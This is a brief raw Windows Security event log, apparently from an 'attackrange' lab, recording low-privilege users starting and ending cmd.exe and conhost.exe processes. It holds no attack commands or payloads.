4688201331200x8020000000000000395266Securityar-win-2.attackrange.localATTACKRANGE\lowprivlowprivATTACKRANGE0x93ad250x1258C:\Windows\System32\cmd.exe%%19380xda0"C:\Windows\system32\cmd.exe" NULL SID--0x0C:\Windows\explorer.exeMandatory Label\Medium Mandatory Level
4689001331300x8020000000000000395265Securityar-win-2.attackrange.localATTACKRANGE\lowpriv2lowpriv2ATTACKRANGE0x96ba380x00x528C:\Windows\System32\conhost.exe
4689001331300x8020000000000000395264Securityar-win-2.attackrange.localATTACKRANGE\lowpriv2lowpriv2ATTACKRANGE0x96ba380xc000013a0xb44C:\Windows\System32\cmd.exe